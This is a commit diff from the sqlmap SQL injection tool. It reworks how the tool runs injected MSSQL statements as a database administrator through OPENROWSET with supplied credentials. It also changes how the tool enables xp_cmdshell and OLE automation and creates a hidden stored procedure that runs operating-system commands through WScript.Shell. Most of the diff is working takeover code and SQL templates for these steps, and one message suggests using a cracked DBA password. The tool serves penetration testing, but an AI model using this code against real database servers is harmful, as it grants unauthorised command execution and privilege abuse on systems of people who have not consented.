more tweaking for issue #34, it's totally not as trivial as it may look (OPENROWSET has many limitations on MSSQL >= 2005)

2025-04-25 03:13:46 +03:00 · 2012-07-02 15:02:00 +01:00 · 2012-07-02 15:02:00 +01:00 · 04d803c7fd
commit 04d803c7fd
parent b7d2680e55
8 changed files with 52 additions and 39 deletions
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -11,6 +11,7 @@ from xml.etree import ElementTree as ET
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import getSPQLSnippet
 from lib.core.common import isDBMSVersionAtLeast
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import randomInt
@ -27,6 +28,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import FROM_DUMMY_TABLE
 from lib.core.settings import GENERIC_SQL_COMMENT
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.unescaper import unescaper
 class Agent:
@ -816,5 +818,20 @@ class Agent:
        return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr
    def runAsDBMSUser(self, query):
        if conf.dCred and "Ad Hoc Distributed Queries" not in query:
            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
                for sqlStatement in sqlStatements:
                    if query.lower().startswith(sqlStatement):
                        sqlType = sqlTitle
                        break
            if sqlType and "SELECT" not in sqlType:
                query = "SELECT %d;%s" % (randomInt(), query)
            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
        return query
 # SQL agent
 agent = Agent()
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@ -10,13 +10,13 @@ from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import randomInt
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import PAYLOAD
 from lib.core.exception import sqlmapUnsupportedFeatureException
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.shell import autoCompletion
 from lib.request import inject
 from lib.takeover.udf import UDF
@ -38,21 +38,6 @@ class Abstraction(Web, UDF, xp_cmdshell):
        Web.__init__(self)
        xp_cmdshell.__init__(self)
    def runAsDBMSUser(self, query):
        if conf.dCred:
            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
                for sqlStatement in sqlStatements:
                    if query.lower().startswith(sqlStatement):
                        sqlType = sqlTitle
                        break
            if sqlType and "SELECT" not in sqlType:
                query = "SELECT 1;%s" % query
            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
        return query
    def execCmd(self, cmd, silent=False):
        if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
            self.webBackdoorRunCmd(cmd)
@ -201,6 +186,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
            if mandatory and not self.isDba():
                warnMsg = "the functionality requested might not work because "
                warnMsg += "the session user is not a database administrator"
                if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ):
                    warnMsg += ". You can try to provide --dbms-cred switch "
                    warnMsg += "to execute statements as a DBA user if you "
                    warnMsg += "were able to extract and crack a DBA "
                    warnMsg += "password by any mean"
                logger.warn(warnMsg)
            if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -5,6 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from lib.core.agent import agent
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import hashDBWrite
@ -40,26 +41,28 @@ class xp_cmdshell:
        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")
-            cmd += "EXEC master..sp_configure 'show advanced options', 1; "
+            cmd += "EXEC master..sp_configure 'show advanced options',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE; "
+            cmd += "RECONFIGURE WITH OVERRIDE;"
-            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
+            cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE; "
+            cmd += "RECONFIGURE WITH OVERRIDE"
-            inject.goStacked(cmd)
+            inject.goStacked(agent.runAsDBMSUser(cmd))
        self.__randStr = randomStr(lowercase=True)
        self.__xpCmdshellNew = randomStr(lowercase=True)
        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
-        cmd += "DECLARE @%s nvarchar(999); " % self.__randStr
+        cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
        cmd += "set @%s='" % self.__randStr
-        cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
+        cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
-        cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
+        cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
-        cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
+        cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
-        cmd += "EXEC sp_OADestroy @ID'; "
+        cmd += "EXEC sp_OADestroy @ID';"
-        cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
+        cmd += "EXEC master..sp_executesql @%s" % self.__randStr
        if Backend.isVersionWithin(("2005", "2008")):
-            cmd += " RECONFIGURE WITH OVERRIDE;"
+            cmd += ";RECONFIGURE WITH OVERRIDE"
-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))
    def __xpCmdshellConfigure2005(self, mode):
        debugMsg = "configuring xp_cmdshell using sp_configure "
@ -88,7 +91,7 @@ class xp_cmdshell:
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)
-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))
    def __xpCmdshellCheck(self):
        cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
@ -153,7 +156,7 @@ class xp_cmdshell:
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
-        return self.runAsDBMSUser(self.__forgedCmd)
+        return agent.runAsDBMSUser(self.__forgedCmd)
    def xpCmdshellExecCmd(self, cmd, silent=False):
        cmd = self.xpCmdshellForgeCmd(cmd)
--- a/procs/mssqlserver/configure_openrowset.txt
+++ b/procs/mssqlserver/configure_openrowset.txt
@ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE;
 EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
 RECONFIGURE WITH OVERRIDE;
 EXEC sp_configure 'show advanced options', 0;
-RECONFIGURE WITH OVERRIDE;
+RECONFIGURE WITH OVERRIDE
--- a/procs/mssqlserver/configure_xp_cmdshell.txt
+++ b/procs/mssqlserver/configure_xp_cmdshell.txt
@ -1,6 +1,6 @@
-EXEC master..sp_configure 'show advanced options', 1;
+EXEC master..sp_configure 'show advanced options',1;
 RECONFIGURE WITH OVERRIDE;
-EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
+EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
 RECONFIGURE WITH OVERRIDE;
-EXEC sp_configure 'show advanced options', 0;
+EXEC sp_configure 'show advanced options',0;
-RECONFIGURE WITH OVERRIDE;
+RECONFIGURE WITH OVERRIDE
--- a/procs/mssqlserver/disable_xp_cmdshell_2000.txt
+++ b/procs/mssqlserver/disable_xp_cmdshell_2000.txt
@ -1 +1 @@
-EXEC master..sp_dropextendedproc 'xp_cmdshell';
+EXEC master..sp_dropextendedproc 'xp_cmdshell'
--- a/procs/mssqlserver/enable_xp_cmdshell_2000.txt
+++ b/procs/mssqlserver/enable_xp_cmdshell_2000.txt
@ -1 +1 @@
-EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll';
+EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'
--- a/procs/mssqlserver/run_statement_as_user.txt
+++ b/procs/mssqlserver/run_statement_as_user.txt
@ -1 +1,2 @@
-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
 # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')
`@ -1 +1 @@`
	`EXEC master..sp_dropextendedproc 'xp_cmdshell';`	`EXEC master..sp_dropextendedproc 'xp_cmdshell'`
`@ -1 +1 @@`
	`EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll';`	`EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'`
`@ -1 +1,2 @@`
	`SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');`	`SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')`
		`# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')`